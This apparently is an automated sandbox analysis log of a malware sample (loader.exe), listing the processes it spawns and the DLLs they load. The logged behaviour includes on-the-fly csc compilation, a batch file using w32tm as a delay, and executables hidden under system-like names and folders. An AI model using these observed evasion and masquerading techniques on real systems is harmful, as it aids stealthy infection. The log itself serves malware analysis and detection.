                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\LiveKernelReports\RuntimeBroker.exe "C:\Windows\LiveKernelReports\RuntimeBroker.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: shfolder.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: iconcodecservice.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: version.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: version.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: version.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: sspicli.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: mscoree.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: version.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: uxtheme.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: windows.storage.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wldp.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: profapi.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptsp.dll
